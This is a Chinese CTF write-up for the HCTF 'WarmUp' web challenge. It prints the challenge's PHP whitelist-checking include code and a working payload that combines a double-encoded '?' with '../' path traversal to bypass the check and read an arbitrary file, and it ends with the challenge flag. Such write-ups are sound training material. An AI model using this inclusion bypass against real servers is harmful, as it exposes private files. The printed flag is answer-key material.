难度系数：
题目来源： HCTF
题目描述： 暂无
题目场景： http://220.249.52.133:38343 （温馨提示：每次进入URL的端口号都不一样）

1、点击链接进入如下界面

2、查看源代码（按F12或F12+Fn），出现以下代码。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <!--source.php-->
    
    <br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>

3、发现了“source.php”

则在链接后面加上“/source.php”

既是http://220.249.52.133:38343/source.php

4、输入URL之后，跳出以下信息

<?php
    highlight_file(__FILE__);
    class emmm
    { 
        public static function checkFile(&$page)
        { 
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) { 
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) { 
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

5、发现了关键信息

$whitelist = [“source”=>“source.php”,“hint”=>“hint.php”];

6、在链接后加上/hint.php

URL： http://220.249.52.133:38343/hint.php

7、输入URL，出现以下信息

8、然后构造payload

?file=source.php%253f/../../../../ffffllllaaaagggg

URL: http://220.249.52.133:38343/source.php?file=source.php%253f/../../../../ffffllllaaaagggg

这样也可以，等等！

9、找到flag

10、OK

flag{25e7bce6005c4e0c983fb97297ac6e5a}